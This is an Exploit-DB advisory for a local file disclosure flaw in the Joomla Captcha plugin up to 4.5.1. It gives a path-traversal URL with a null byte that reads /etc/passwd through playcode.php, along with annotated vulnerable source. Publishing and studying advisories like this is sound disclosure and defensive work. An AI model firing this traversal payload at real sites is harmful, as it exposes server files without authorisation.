Joomla! Plugin Captcha 4.5.1 - Local File Disclosure

EDB-ID:

15958

CVE:


EDB Verified:

Author:

dun

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2011-01-09

Vulnerable App: 
  :::::::-.   ...    ::::::.    :::.
   ;;,   `';, ;;     ;;;`;;;;,  `;;;
   `[[     [[[['     [[[  [[[[[. '[[
    $$,    $$$$      $$$  $$$ "Y$c$$
    888_,o8P'88    .d888  888    Y88
    MMMMP"`   "YmmMMMM""  MMM     YM
 
   [ Discovered by dun \ posdub[at]gmail.com ]

 #############################################################################
 #  [ Joomla Captcha Plugin <= 4.5.1 ]  Local File Disclosure Vulnerability  #
 #############################################################################
 #
 # Script: "Joomla Captcha plugin and patch for Joomla!"
 #
 # Script site: http://www.kupala.net/
 # Download: http://code.google.com/p/joomla15captcha/
 #
 # 
 # [LFI] (magic_quotes_gpc = Off)
 # Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
 #       dun@radius ~ $ cat joomlacaptcha.mp3
 #       root:x:0:0:root:/root:/bin/bash
 #       ......
 # 
 # File: ./plugins/system/captcha/playcode.php
 # 
 #     79	if (!$captchacode) $captchacode = '0000000000';									
 #     80	
 #     81	session_write_close();
 #     82	
 #     83	@$lng = $_GET['lng'];                                                 // [1]
 #     84	if ( !$lng ) $lng = 'en-gb';
 #     85	
 #     86	$captchafilename = "joomlacaptcha.mp3";
 #     87	$captchalength = strlen( $captchacode );
 #     88	
 #     89	$outlength = 0;
 #     90	$reallength = 0;
 #     91	$currsize = 0;
 #     92	$outstream = '';
 #     93	
 #     94	if ($captchalength > 0) {
 #     95		for ($i = 0; $i < $captchalength; $i++) {
 #     96			$soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3';   // [2]
 #     97		}
 #     98		foreach ($soundfiles as $onefile){                                     // 
 #     99			if (file_exists( $onefile )) {                                 // 
 #    100				$instream = fopen( $onefile, 'rb' );                   // 
 #    101				$currsize = filesize( $onefile );                      // [3]
 #    102				$outstream .= fread( $instream, $currsize );           // 
 #    103				$outlength += $currsize;                               // 
 #    104				fclose( $instream );                                   // 
 #    105				$reallength += 1;                                      // 
 #    106			}
 #    107		}
 #    108	}
 #    109	
 #    110	if (($outstream == '') || ($captchalength != $reallength)) {
 #    111			$outstream = 0; $outlength = 1;
 #    112	}
 #    113	
 #    114	ob_start();
 #    115	header( 'Content-Type: audio/x-mpeg');                                         //
 #    116	header( "Content-Disposition: attachment; filename=$captchafilename;");        //
 #    117	header( 'Content-Transfer-Encoding: binary');                                  //
 #    118	header( 'Content-Length: '.$outlength);                                        //
 #    119	echo $outstream ;                                                              // [4] LFD
 #    120	ob_end_flush();
 # 
 # 
 # [ dun / 2011-01-09 ]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services